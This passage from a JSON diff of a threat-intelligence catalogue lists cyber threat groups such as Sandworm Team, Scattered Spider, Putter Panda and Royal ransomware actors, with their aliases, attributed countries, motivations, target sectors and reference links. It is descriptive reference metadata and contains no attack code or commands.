2016](https://app.tidalcyber.com/references/87c9f8e4-f8d1-4f19-86ca-6fd18a33890b)][[Microsoft SIR Vol 21](https://app.tidalcyber.com/references/619b9cf8-7201-45de-9c36-834ccee356a9)][[Talos Promethium June 2020](https://app.tidalcyber.com/references/188d990e-f0be-40f2-90f3-913dfe687d27)]", + "meta": { + "group_attack_id": "G0056", + "observed_countries": [ + "TR" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [ + { + "dest-uuid": "43894e2a-174e-4931-94a8-2296afe8f650", + "type": "similar" + }, + { + "dest-uuid": "aa5e87f3-6e59-4abf-aeba-a49eb9d495f3", + "type": "similar" + } + ], + "uuid": "cc798766-8662-4b55-8536-6d057fbc58f0", + "value": "PROMETHIUM" + }, + { + "description": "[[Cylance Putter Panda](https://app.tidalcyber.com/references/058d6e8e-7ab9-4151-97de-1778ac95e18d)]", + "meta": { + "id": "d55c62a4-1477-4a32-a669-7bc113e52f95" + }, + "related": [ + { + "dest-uuid": "6005f4a9-fe26-4237-a44e-3f6cbb1fe75c", + "type": "similar" + } + ], + "uuid": "bab4d1df-a6c6-40ae-b583-83c4492cbbd2", + "value": "APT2" + }, + { + "description": "[[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]", + "meta": { + "id": "b80baeda-6ed3-413d-9412-1d49e035a898" + }, + "related": [ + { + "dest-uuid": "6005f4a9-fe26-4237-a44e-3f6cbb1fe75c", + "type": "similar" + } + ], + "uuid": "9975905f-c429-4911-800d-d21e9a29b3f8", + "value": "MSUpdater" + }, + { + "description": "[Putter Panda](https://app.tidalcyber.com/groups/6005f4a9-fe26-4237-a44e-3f6cbb1fe75c) is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA’s 3rd General Staff Department (GSD). [[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]", + "meta": { + "country": "CN", + "group_attack_id": "G0024", + "observed_countries": [ + "JP", + "US" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Aerospace", + "Defense", + "Government", + "Technology", + "Telecommunications" + ] + }, + "related": [ + { + "dest-uuid": "0ca45163-e223-4167-b1af-f088ed14a93d", + "type": "similar" + }, + { + "dest-uuid": "bab4d1df-a6c6-40ae-b583-83c4492cbbd2", + "type": "similar" + }, + { + "dest-uuid": "9975905f-c429-4911-800d-d21e9a29b3f8", + "type": "similar" + } + ], + "uuid": "6005f4a9-fe26-4237-a44e-3f6cbb1fe75c", + "value": "Putter Panda" + }, + { + "description": "[Rancor](https://app.tidalcyber.com/groups/021b3c71-6467-4e46-a413-8b726f066f2c) is a threat group that has led targeted campaigns against the South East Asia region. [Rancor](https://app.tidalcyber.com/groups/021b3c71-6467-4e46-a413-8b726f066f2c) uses politically-motivated lures to entice victims to open malicious documents. [[Rancor Unit42 June 2018](https://app.tidalcyber.com/references/45098a85-a61f-491a-a549-f62b02dc2ecd)]", + "meta": { + "group_attack_id": "G0075", + "observed_countries": [ + "KH", + "SG" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [ + { + "dest-uuid": "79c7c7e0-79d5-11e8-9b9c-1ff96be20c0b", + "type": "similar" + } + ], + "uuid": "021b3c71-6467-4e46-a413-8b726f066f2c", + "value": "Rancor" + }, + { + "description": "This object represents the behaviors associated with operators of Rhysida ransomware, which is licensed on a ransomware-as-a-service (\"RaaS\") basis. Various affiliated ransomware operators likely do not operate as a cohesive unit. The Rhysida RaaS operation has been active since May 2023, claiming attacks on multiple sectors in several countries in North and South America, Western Europe, and Australia. Many alleged victims are education sector entities. Security researchers have observed TTP and victimology overlaps with the Vice Society extortion group.[[HC3 Analyst Note Rhysida Ransomware August 2023](/references/3f6e2821-5073-4382-b5dd-08676eaa2240)]\n\n**Related Vulnerabilities**: CVE-2020-1472[[U.S. CISA Rhysida Ransomware November 15 2023](/references/6d902955-d9a9-4ec1-8dd4-264f7594605e)]", + "meta": { + "group_attack_id": "G5013", + "observed_countries": [ + "AU", + "AT", + "BR", + "CA", + "FR", + "DE", + "IN", + "ID", + "IL", + "IT", + "KE", + "NL", + "QA", + "SG", + "ES", + "GB", + "US" + ], + "observed_motivations": [ + "Financial Gain" + ], + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "15787198-6c8b-4f79-bf50-258d55072fee", + "2743d495-7728-4a75-9e5f-b64854039792", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "target_categories": [ + "Banks", + "Education", + "Government", + "Healthcare", + "Insurance", + "Manufacturing", + "Technology", + "Utilities" + ] + }, + "related": [], + "uuid": "0610cd57-2511-467a-97e3-3c810384074f", + "value": "Rhysida Ransomware Actors" + }, + { + "description": "[Rocke](https://app.tidalcyber.com/groups/71222310-2807-4599-bb92-248eaf2e03ab) is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name [Rocke](https://app.tidalcyber.com/groups/71222310-2807-4599-bb92-248eaf2e03ab) comes from the email address \"rocke@live.cn\" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between [Rocke](https://app.tidalcyber.com/groups/71222310-2807-4599-bb92-248eaf2e03ab) and the Iron Cybercrime Group, though this attribution has not been confirmed.[[Talos Rocke August 2018](https://app.tidalcyber.com/references/bff0ee40-e583-4f73-a013-4669ca576904)]", + "meta": { + "group_attack_id": "G0106", + "observed_countries": [], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [], + "uuid": "71222310-2807-4599-bb92-248eaf2e03ab", + "value": "Rocke" + }, + { + "description": "Royal is a ransomware group believed to be responsible for hundreds of attacks on victims worldwide, including those in critical infrastructure sectors including manufacturing, communications, healthcare, and education. The actors that comprise the Royal ransomware operation are believed to be former members of other cybercriminal groups linked to Roy/Zeon ransomware, Conti ransomware, and TrickBot. Unlike many of the other most prominent ransomware groups in recent years, the developers of Royal ransomware are not known to lease the malware to affiliates as a service.[[Kroll Royal Deep Dive February 2023](/references/dcdcc965-56d0-58e6-996b-d8bd40916745)]\n\nThe Royal group often pressures victims into paying ransom demands by threatening to leak data exfiltrated during intrusions. While public data from the [ransomwatch project](https://github.com/joshhighet/ransomwatch) suggest the group has claimed roughly 200 victims since Q4 2022, a November 2023 U.S. government advisory indicated that Royal “has targeted over 350 known victims worldwide” since September 2022, with extortion demands at times exceeding $250 million.[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)][[CISA Royal AA23-061A March 2023](/references/81baa61e-13c3-51e0-bf22-08383dbfb2a1)]", + "meta": { + "group_attack_id": "G5014", + "observed_countries": [ + "AU", + "BR", + "CA", + "DE", + "IT", + "MX", + "PT", + "GB", + "US" + ], + "observed_motivations": [ + "Financial Gain" + ], + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "d63754b9-0267-4a70-82a3-212ef32fa796", + "15787198-6c8b-4f79-bf50-258d55072fee", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "target_categories": [ + "Agriculture", + "Construction", + "Education", + "Energy", + "Financial Services", + "Government", + "Healthcare", + "High Tech", + "Hospitality Leisure", + "Insurance", + "Legal", + "Manufacturing", + "Media", + "Non Profit", + "Retail", + "Telecommunications", + "Transportation", + "Utilities" + ] + }, + "related": [], + "uuid": "86b97a39-49c3-431e-bcc8-f4e13dbfcdf5", + "value": "Royal Ransomware Actors" + }, + { + "description": "[RTM](https://app.tidalcyber.com/groups/666ab5f0-3ef1-4e74-8a10-65c60a7d1acd) is a cybercriminal group that has been active since at least 2015 and is primarily interested in users of remote banking systems in Russia and neighboring countries. The group uses a Trojan by the same name ([RTM](https://app.tidalcyber.com/software/1836485e-a3a6-4fae-a15d-d0990788811a)). [[ESET RTM Feb 2017](https://app.tidalcyber.com/references/ab2cced7-05b8-4788-8d3c-8eadb0aaf38c)]", + "meta": { + "group_attack_id": "G0048", + "observed_countries": [ + "CZ", + "DE", + "KZ", + "RU", + "UA" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [ + { + "dest-uuid": "88100602-8e8b-11e9-bb7c-1bf20b58e305", + "type": "similar" + } + ], + "uuid": "666ab5f0-3ef1-4e74-8a10-65c60a7d1acd", + "value": "RTM" + }, + { + "description": "[[NCSC Sandworm Feb 2020](https://app.tidalcyber.com/references/d876d037-9d24-44af-b8f0-5c1555632b91)][[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)][[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)]", + "meta": { + "id": "0eb61a7c-2b53-49fe-80d4-6cb9a6b83773" + }, + "related": [ + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "similar" + } + ], + "uuid": "4316121a-b50b-40bc-bb4b-2c6fc9ec127b", + "value": "Telebots" + }, + { + "description": "[[Secureworks IRON VIKING ](https://app.tidalcyber.com/references/900753b3-c5a2-4fb5-ab7b-d38df867077b)][[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)][[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)]", + "meta": { + "id": "44ca1cdb-4402-4542-b820-cafe1540c80b" + }, + "related": [ + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "similar" + } + ], + "uuid": "eeb7e31b-93e9-4244-a31a-6ce9116a4b70", + "value": "IRON VIKING" + }, + { + "description": "[[CrowdStrike VOODOO BEAR](https://app.tidalcyber.com/references/ce07d409-292d-4e8e-b1af-bd5ba46c1b95)][[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)][[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)]", + "meta": { + "id": "4fa0ab56-8b04-4947-b54c-f7ce39c47f38" + }, + "related": [ + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "similar" + } + ], + "uuid": "819b7ba2-f3be-4649-b499-525f8c0579eb", + "value": "Voodoo Bear" + }, + { + "description": "[[Dragos ELECTRUM](https://app.tidalcyber.com/references/494f7056-7a39-4fa0-958d-fb1172d01852)][[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)]", + "meta": { + "id": "b976b934-7cdb-4134-b8af-2c99d8fd4ad5" + }, + "related": [ + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "similar" + } + ], + "uuid": "483450ad-d811-4f3e-85db-f2761fa308a6", + "value": "ELECTRUM" + }, + { + "description": "[[NCSC Sandworm Feb 2020](https://app.tidalcyber.com/references/d876d037-9d24-44af-b8f0-5c1555632b91)][[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)]", + "meta": { + "id": "6b447e1c-95ae-4d7b-a46b-021ce5253312" + }, + "related": [ + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "similar" + } + ], + "uuid": "42a50ea5-66f1-4802-b2a0-3fe6ea4f42d4", + "value": "BlackEnergy (Group)" + }, + { + "description": "[[iSIGHT Sandworm 2014](https://app.tidalcyber.com/references/63622990-5467-42b2-8f45-b675dfc4dc8f)] [[F-Secure BlackEnergy 2014](https://app.tidalcyber.com/references/5f228fb5-d959-4c4a-bb8c-f9dc01d5af07)][[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)]", + "meta": { + "id": "9fe01b2a-9edb-4fee-b061-f73e977868bd" + }, + "related": [ + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "similar" + } + ], + "uuid": "5f428057-fad5-4ba5-bd2e-ff0505184371", + "value": "Quedagh" + }, + { + "description": "[[Microsoft Prestige ransomware October 2022](https://app.tidalcyber.com/references/b57e1181-461b-5ada-a739-873ede1ec079)]", + "meta": { + "id": "3e832259-e53e-5080-9af4-89c94f5675da" + }, + "related": [ + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "similar" + } + ], + "uuid": "84c4e254-d02f-5141-b0c6-d52618177024", + "value": "IRIDIUM" + }, + { + "description": "[Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.[[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)][[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)] This group has been active since at least 2009.[[iSIGHT Sandworm 2014](https://app.tidalcyber.com/references/63622990-5467-42b2-8f45-b675dfc4dc8f)][[CrowdStrike VOODOO BEAR](https://app.tidalcyber.com/references/ce07d409-292d-4e8e-b1af-bd5ba46c1b95)][[USDOJ Sandworm Feb 2020](https://app.tidalcyber.com/references/fefa7321-cd60-4c7e-a9d5-c723d88013f2)][[NCSC Sandworm Feb 2020](https://app.tidalcyber.com/references/d876d037-9d24-44af-b8f0-5c1555632b91)]\n\nIn October 2020, the US indicted six GRU Unit 74455 officers associated with [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide [NotPetya](https://app.tidalcyber.com/software/2538e0fe-1290-4ae1-aef9-e55d83c9eb23) attack, targeting of the 2017 French presidential campaign, the 2018 [Olympic Destroyer](https://app.tidalcyber.com/software/073b5288-11d6-4db0-9f2c-a1816847d15c) attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.[[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)][[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)] Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5).[[US District Court Indictment GRU Oct 2018](https://app.tidalcyber.com/references/56aeab4e-b046-4426-81a8-c3b2323492f0)]", + "meta": { + "country": "RU", + "group_attack_id": "G0034", + "observed_countries": [ + "AZ", + "BY", + "FR", + "GE", + "IR", + "IL", + "KZ", + "KR", + "KG", + "LT", + "PL", + "RU", + "UA", + "US" + ], + "observed_motivations": [ + "Destruction" + ], + "source": "MITRE", + "tags": [ + "f2ae2283-f94d-4f8f-bbde-43f2bed66c55" + ], + "target_categories": [ + "Energy", + "Government" + ] + }, + "related": [ + { + "dest-uuid": "f512de42-f76b-40d2-9923-59e7dbdfec35", + "type": "similar" + }, + { + "dest-uuid": "4316121a-b50b-40bc-bb4b-2c6fc9ec127b", + "type": "similar" + }, + { + "dest-uuid": "eeb7e31b-93e9-4244-a31a-6ce9116a4b70", + "type": "similar" + }, + { + "dest-uuid": "819b7ba2-f3be-4649-b499-525f8c0579eb", + "type": "similar" + }, + { + "dest-uuid": "483450ad-d811-4f3e-85db-f2761fa308a6", + "type": "similar" + }, + { + "dest-uuid": "42a50ea5-66f1-4802-b2a0-3fe6ea4f42d4", + "type": "similar" + }, + { + "dest-uuid": "5f428057-fad5-4ba5-bd2e-ff0505184371", + "type": "similar" + }, + { + "dest-uuid": "84c4e254-d02f-5141-b0c6-d52618177024", + "type": "similar" + } + ], + "uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "value": "Sandworm Team" + }, + { + "description": "[Scarlet Mimic](https://app.tidalcyber.com/groups/6c1bdc51-f633-4512-8b20-04a11c2d97f4) is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group's motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by [Scarlet Mimic](https://app.tidalcyber.com/groups/6c1bdc51-f633-4512-8b20-04a11c2d97f4) and [Putter Panda](https://app.tidalcyber.com/groups/6005f4a9-fe26-4237-a44e-3f6cbb1fe75c), it has not been concluded that the groups are the same. [[Scarlet Mimic Jan 2016](https://app.tidalcyber.com/references/f84a5b6d-3af1-45b1-ac55-69ceced8735f)]", + "meta": { + "group_attack_id": "G0029", + "observed_countries": [ + "CN" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Human Rights" + ] + }, + "related": [ + { + "dest-uuid": "0da10682-85c6-4c0b-bace-ba1f7adfb63e", + "type": "similar" + } + ], + "uuid": "6c1bdc51-f633-4512-8b20-04a11c2d97f4", + "value": "Scarlet Mimic" + }, + { + "description": "[[CrowdStrike Scattered Spider BYOVD January 2023](https://app.tidalcyber.com/references/d7d86f5d-1f02-54b0-b6f4-879878563245)]", + "meta": { + "id": "29f2a6c2-405e-5b7b-8222-cd5bb4c1fc97" + }, + "related": [ + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "similar" + } + ], + "uuid": "a8be581c-10b8-5d79-b35b-ebc47e511597", + "value": "Roasted 0ktapus" + }, + { + "description": "[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]", + "meta": { + "id": "cb9929a9-66f4-4191-9caf-47c211c308b0", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "similar" + } + ], + "uuid": "890f22c5-6e7f-461f-8099-bb7d7c062d27", + "value": "Starfraud" + }, + { + "description": "[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]", + "meta": { + "id": "7b671400-1177-42a2-a5f6-26c0b7e10fed", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "similar" + } + ], + "uuid": "d850076d-6caa-46f2-958d-4e93f43b88f6", + "value": "UNC3944" + }, + { + "description": "[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]", + "meta": { + "id": "007713f3-6afe-4398-9e6c-9596be3f4c59", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "similar" + } + ], + "uuid": "36002039-b1dc-46bd-affe-fd37edae375c", + "value": "Scatter Swine" + }, + { + "description": "[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]", + "meta": { + "id": "59e6dc0c-ff8f-43bf-8780-90101ab98dbc", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "similar" + } + ], + "uuid": "fd282f3e-0aba-4f40-873f-1b1e56f55591", + "value": "Muddled Libra" + }, + { + "description": "[Scattered Spider](https://app.tidalcyber.com/groups/3d77fb6c-cfb4-5563-b0be-7aa1ad535337) is a cybercriminal group that has been active since at least 2022 targeting customer relationship management and business-process outsourcing (BPO) firms as well as telecommunications and technology companies. During campaigns [Scattered Spider](https://app.tidalcyber.com/groups/3d77fb6c-cfb4-5563-b0be-7aa1ad535337) has leveraged targeted social-engineering techniques and attempted to bypass popular endpoint security tools.[[CrowdStrike Scattered Spider Profile](https://app.tidalcyber.com/references/a865a984-7f7b-5f82-ac4a-6fac79a2a753)][[CrowdStrike Scattered Spider BYOVD January 2023](https://app.tidalcyber.com/references/d7d86f5d-1f02-54b0-b6f4-879878563245)][[Crowdstrike TELCO BPO Campaign December 2022](https://app.tidalcyber.com/references/382785e1-4ef3-506e-b74f-cd07df9ae46e)]", + "meta": { + "group_attack_id": "G1015", + "observed_countries": [ + "AU", + "BR", + "CA", + "CR", + "DK", + "FR", + "IN", + "IE", + "IL", + "JP", + "SE", + "CH", + "GB", + "US" + ], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [ + "15787198-6c8b-4f79-bf50-258d55072fee", + "2e5f6e4a-4579-46f7-9997-6923180815dd", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "target_categories": [ + "Aerospace", + "Casinos Gambling", + "Commercial", + "Construction", + "Defense", + "Education", + "Entertainment", + "Financial Services", + "Hospitality Leisure", + "Legal", + "Media", + "Pharmaceuticals", + "Retail", + "Technology", + "Telecommunications", + "Transportation", + "Utilities", + "Video Games" + ] + }, + "related": [ + { + "dest-uuid": "a8be581c-10b8-5d79-b35b-ebc47e511597", + "type": "similar" + }, + { + "dest-uuid": "890f22c5-6e7f-461f-8099-bb7d7c062d27", + "type": "similar" + }, + { + "dest-uuid": "d850076d-6caa-46f2-958d-4e93f43b88f6", + "type": "similar" + }, + { + "dest-uuid": "36002039-b1dc-46bd-affe-fd37edae375c", + "type": "similar" + }, + { + "dest-uuid": "fd282f3e-0aba-4f40-873f-1b1e56f55591", + "type": "similar" + } + ], + "uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "value": "Scattered Spider" + }, + { + "description": "[SideCopy](https://app.tidalcyber.com/groups/31bc763e-623f-4870-9780-86e43d732594) is a Pakistani threat group that has primarily targeted South Asian countries, including Indian and Afghani government personnel, since at least 2019. [SideCopy](https://app.tidalcyber.com/groups/31bc763e-623f-4870-9780-86e43d732594)'s name comes from its infection chain that tries to mimic that of [Sidewinder](https://app.tidalcyber.com/groups/44f8bd4e-a357-4a76-b031-b7455a305ef0), a suspected Indian threat group.[[MalwareBytes SideCopy Dec 2021](https://app.tidalcyber.com/references/466569a7-1ef8-4824-bd9c-d25301184ea4)]", + "meta": { + "group_attack_id": "G1008", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [], + "uuid": "31bc763e-623f-4870-9780-86e43d732594", + "value": "SideCopy" + }, + { + "description": "[[Cyble Sidewinder September 2020](https://app.tidalcyber.com/references/25d8d6df-d3b9-4f57-bce0-d5285660e746)]", + "meta": { + "id": "2520a2c7-38ad-4360-8adc-bc309746ff52" + }, + "related": [ + { + "dest-uuid": "44f8bd4e-a357-4a76-b031-b7455a305ef0", + "type": "similar" + } + ], + "uuid": "3e580fae-6d8a-4c1c-b132-ddf47d0ff6c9", + "value": "T-APT-04" + }, + { + "description": "[[Cyble Sidewinder September 2020](https://app.tidalcyber.com/references/25d8d6df-d3b9-4f57-bce0-d5285660e746)]", + "meta": { + "id": "b0f3f694-f414-4e42-b95d-1a790b64b6ca" + }, + "related": [ + { + "dest-uuid": "44f8bd4e-a357-4a76-b031-b7455a305ef0", + "type": "similar" + } + ], + "uuid": "023a26e3-77a9-44b3-932f-23c82100881c", + "value": "Rattlesnake" + }, + { + "description": "[Sidewinder](https://app.tidalcyber.com/groups/44f8bd4e-a357-4a76-b031-b7455a305ef0) is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan.[[ATT Sidewinder January 2021](https://app.tidalcyber.com/references/d6644f88-d727-4f62-897a-bfa18f86380d)][[Securelist APT Trends April 2018](https://app.tidalcyber.com/references/587f5195-e696-4a3c-8c85-90b9c002cd11)][[Cyble Sidewinder September 2020](https://app.tidalcyber.com/references/25d8d6df-d3b9-4f57-bce0-d5285660e746)]", + "meta": { + "country": "IN", + "group_attack_id": "G0121", + "observed_countries": [ + "AF", + "BD", + "CN", + "MM", + "NP", + "PK", + "QA", + "LK" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Energy", + "Government", + "Mining" + ] + }, + "related": [ + { + "dest-uuid": "3e580fae-6d8a-4c1c-b132-ddf47d0ff6c9", + "type": "similar" + }, + { + "dest-uuid": "023a26e3-77a9-44b3-932f-23c82100881c", + "type": "similar" + } + ], + "uuid": "44f8bd4e-a357-4a76-b031-b7455a305ef0", + "value": "Sidewinder" + }, + { + "description": "[[Crowdstrike GTR2020 Mar 2020](https://app.tidalcyber.com/references/a2325ace-e5a1-458d-80c1-5037bd7fa727)]", + "meta": { + "id": "5e7bdbc9-27c0-4801-bd67-26a5afa78cc5" + }, + "related": [ + { + "dest-uuid": "b534349f-55a4-41b8-9623-6707765c3c50", + "type": "similar" + } + ], + "uuid": "4e28aead-8a85-4ae2-88d0-fa21fc7aa6a0", + "value": "Whisper Spider" + }, + { + "description": "[Silence](https://app.tidalcyber.com/groups/b534349f-55a4-41b8-9623-6707765c3c50) is a financially motivated threat actor targeting financial institutions in different countries. The group was first seen in June 2016. Their main targets reside in Russia, Ukraine, Belarus, Azerbaijan, Poland and Kazakhstan. They compromised various banking systems, including the Russian Central Bank's Automated Workstation Client, ATMs, and card processing.[[Cyber Forensicator Silence Jan 2019](https://app.tidalcyber.com/references/c328d6d3-5e8b-45a6-8487-eecd7e8cbf7e)][[SecureList Silence Nov 2017](https://app.tidalcyber.com/references/004a8877-7e57-48ad-a6ce-b9ad8577cc68)] ", + "meta": { + "group_attack_id": "G0091", + "observed_countries": [ + "AZ", + "BY", + "KZ", + "PL", + "RU", + "UA" + ], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [ + "15787198-6c8b-4f79-bf50-258d55072fee" + ], + "target_categories": [ + "Banks", + "Financial Services" + ] + }, + "related": [ + { + "dest-uuid": "4e28aead-8a85-4ae2-88d0-fa21fc7aa6a0", + "type": "similar" + } + ], + "uuid": "b534349f-55a4-41b8-9623-6707765c3c50", + "value": "Silence" + }, + { + "description": "[[Proofpoint TA407 September 2019](https://app.tidalcyber.com/references/e787e9af-f496-442a-8b36-16056ff8bfc1)][[Malwarebytes Silent Librarian October 2020](https://app.tidalcyber.com/references/9bb8ddd0-a8ec-459b-9983-79ccf46297ca)]", + "meta": { + "id": "5d46e5fe-8597-4606-bd43-9a0426548854" + }, + "related": [ + { + "dest-uuid": "0e7bd4da-7974-49c9-b213-116bd7157761", + "type": "similar" + } + ], + "uuid": "c39d60d6-bb43-47e5-bc8d-e73fa1ef8c1d", + "value": "TA407" + }, + { + "description": "[[Secureworks COBALT DICKENS August 2018](https://app.tidalcyber.com/references/addbb46b-b2b5-4844-b4be-f6294cf51caa)][[Secureworks COBALT DICKENS September 2019](https://app.tidalcyber.com/references/45815e4d-d678-4823-8315-583893e263e6)][[Proofpoint TA407 September 2019](https://app.tidalcyber.com/references/e787e9af-f496-442a-8b36-16056ff8bfc1)][[Malwarebytes Silent Librarian October 2020](https://app.tidalcyber.com/references/9bb8ddd0-a8ec-459b-9983-79ccf46297ca)]", + "meta": { + "id": "770197f5-de40-4936-962a-f256e1ee7717" + }, + "related": [ + { + "dest-uuid": "0e7bd4da-7974-49c9-b213-116bd7157761", + "type": "similar" + } + ], + "uuid": "1a968e44-b931-4373-96f8-ecb976540fd3", + "value": "COBALT DICKENS" + }, + { + "description": "[Silent Librarian](https://app.tidalcyber.com/groups/0e7bd4da-7974-49c9-b213-116bd7157761) is a group that has targeted research and proprietary data at universities, government agencies, and private sector companies worldwide since at least 2013. Members of [Silent Librarian](https://app.tidalcyber.com/groups/0e7bd4da-7974-49c9-b213-116bd7157761) are known to have been affiliated with the Iran-based Mabna Institute which has conducted cyber intrusions at the behest of the government of Iran, specifically the Islamic Revolutionary Guard Corps (IRGC).[[DOJ Iran Indictments March 2018](https://app.tidalcyber.com/references/7dfdccd5-d035-4678-89c1-f5f1630d7a79)][[Phish Labs Silent Librarian](https://app.tidalcyber.com/references/d79d0510-4d49-464d-8074-daedd186f1c1)][[Malwarebytes Silent Librarian October 2020](https://app.tidalcyber.com/references/9bb8ddd0-a8ec-459b-9983-79ccf46297ca)]", + "meta": { + "country": "IR", + "group_attack_id": "G0122", + "observed_countries": [ + "AU", + "CA", + "CN", + "FR", + "DE", + "HK", + "IL", + "JP", + "NZ", + "NO", + "OM", + "SA", + "ZA", + "ES", + "SE", + "CH", + "TR", + "GB", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Education", + "Government" + ] + }, + "related": [ + { + "dest-uuid": "c39d60d6-bb43-47e5-bc8d-e73fa1ef8c1d", + "type": "similar" + }, + { + "dest-uuid": "1a968e44-b931-4373-96f8-ecb976540fd3", + "type": "similar" + } + ], + "uuid": "0e7bd4da-7974-49c9-b213-116bd7157761", + "value": "Silent Librarian" + }, + { + "description": "[SilverTerrier](https://app.tidalcyber.com/groups/e47ae2a7-d34d-4528-ba67-c9c07daa91ba) is a Nigerian threat group that has been seen active since 2014. 